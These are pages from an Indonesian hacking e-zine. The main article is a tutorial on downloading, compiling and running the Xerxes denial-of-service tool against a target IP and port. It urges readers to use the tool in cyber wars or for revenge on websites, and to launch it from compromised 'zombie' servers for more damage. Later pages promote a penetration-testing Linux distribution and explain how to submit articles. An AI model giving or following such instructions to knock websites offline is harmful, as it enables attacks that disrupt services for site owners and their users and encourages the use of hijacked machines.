Ivan Tabrakan Untuk Kuotanya and My Brother Ical yang udah menjadi penerjemah,

hahahaha gak perlu buka gugel translate lagi kan udah ada ical translate

./regards

Bifi

Page 65: E zit #vol 2

65 e-ZIT #Vol 2 - Networking

Network Attack > How To Use Xerxes DDoS Tools

Yups Malam Semuanya,,

jumpa lagi sama saya Bifi yang aneh dan gemana gitu...

okok, bagi kaka-kaka para peserta #OP atau yang suka ngikutin perang cyber, entah demi

membela negara, agama, atau memang dendam sama website target, yups sesuai judul

diatas kali ini Bifi mau share tentang cara penggunaan Xerxes DDoS Tool,, nah yang belum

tau tentang tools yang 1 ini, neh Bifi kasih tau Xerxes itu nama toolsnya wkwkwkkw, yup

isinya berupa script-script gak masuk akal make bahasa C, nah tools ini digunakan oleh Th3

J3st3r untuk takedown situs-situs yang jadi target mereka....

nah kenapa Bifi jadiin ini thread karena, Bifi Udah puyeng nyari tutornya di mbah gugel tapi

nggak ketemu cara gunain tuh tools, yang ada hanya scriptnya doang,,,,

okeh langsung aja yah, pertama kita donlod atau copas dulu scriptnya disini

http://pastebin.com/aWZMbjSU

next,,

kalo udah, ganti extensinya dengan "C" contoh xerxes.txt ganti dengan xerxes.c atau kalo di

copas langsung aja save dengan extensi "c" nya contoh xerxes.c...

yup untuk ngejalaninnya kita harus compile dulu scriptnya,

kalo dilinux nama compilernya g++, itu loh compilernya bahasa C, kalo nggak salah,, dan kalo

belum punya langsung di install aja sekalian, neh comandnya..

sudo apt-get install g++

lanjood,,

nah cara compilenya [untuk linux] gini open terminal ketik g++ namafile -o nama output

filenya

contoh : g++ xerxes.c -o xerxes

kalo untuk windows pake Turbo C, cuman Bifi belum tau cara make nya...

siip, setelah di compile jalankan scriptnya,

masih di terminal linux, ketik ./nama toolsnya [IP Target] [Port]

contoh : ./xerxes 200.100.1.1 80 lalu tekan enter,,, siip tinggal tunggu aja ampe targetnya

mampus...

Page 66: E zit #vol 2

66 e-ZIT #Vol 2 - Networking

nb > bagusnya bandwith kaka dewo, biar nggak jadi senjata makan tuan,, dan untuk

penggunaan yang lebih memuaskan a.k.a mematikan, mending ne script di taruh di zombie-

zombienya agan, trus di execute, apalagi kalo punya zombie di server-server negara besar

yang mempunyai speed inet dewo, makin ampuh deh,,,,,,

nah sekian tutorial Bifi, Salam Backtrackers

Gretz To > All Codernate | ZIT Crew

referensi :

http://www.google.com

http://www.securitytube.net

./regards

Bifi

Page 67: E zit #vol 2

67 e-ZIT #Vol 2 - Networking

ZIT Product & Info

Codernate Linux 1.4 (Dodorobe) Released!!!

Versi : Codernate Linux 1.4 Dodorobe Tanggal Rilis : 13 Januari 2014 Pengguna : Beginers s/d Expert Ukuran : 2.14 GB Codernate Linux merupakan Sistem Operasi Berbasis Open Source (Linux) yang merupakan Turunan dari Ubuntu 10.04 yang di kembangkan oleh Komunitas Zona IT Ternate. Codernate Linux sendiri di modifikasi khusus untuk penetrasi jaringan, dan kurang lebih terdapat sekitar 150 tool penetrasi yang filenya terdapat pada folder /pentest, dan langsung bisa di eksekusi lewat menu Codernate.

Page 68: E zit #vol 2

68 e-ZIT #Vol 2 - Networking

Dan setelah mengalami beberapa perbaikan pada bug dan tools, akhirnya Codernate Linux 1. 4 dengan Codename "Dodorobe" dengan bangga kami lepas ke publik. pada versi yang kali ini masih sama seperti pada versi sebelumnya, yaitu masih tetap pada penetrasi jaringan, hanya saja untuk yang versi ke 4 ini sudah ada sedikit penambahan beberapa tools dll.

Bagi Teman-teman yang ingin langsung mencobanya bisa langsung download di link berikut...

http://apps.e-zit.com/Codernate_Linux_1.4_dodorobe_v.iso << Dodorebe untuk yang pengen coba versi sebelumnya [Codernate Cacarlak], bias juga di download di link dibwah ini http://apps.e-zit.com/Codernate_Linux_1.3_cacarlak_v.iso << Cacarlak

./regards

e-ZIT

Page 69: E zit #vol 2

69 e-ZIT #Vol 2 - Networking

Credits

Cara Kirim Artikel Di e-ZIT edisi berikutnya

Isi materi artikel:

Programing

Networking

Operating System

Design & Art

Hacking

Catatan: Artikel diharapkan sudah di post sebelumnya di www.forum.codernate.org, jika

materi hasil copas, harap di sertakan link referensinya, artikel yang masuk akan di seleksi

terlebih dahulu oleh redaksi e-ZIT.

Redaksi

Website : www.e-zit.com

Layouter : e-ZIT

Editor : e-ZIT

Cover : Bifi

Grets To : JMozac, Feenx_0, Mavis Vermilion, shockw4f3, Surtua, r8punkz3l, Bifi n All Staff

Zona IT Ternate

Page 70: E zit #vol 2

70 e-ZIT #Vol 2 - Networking

Home Page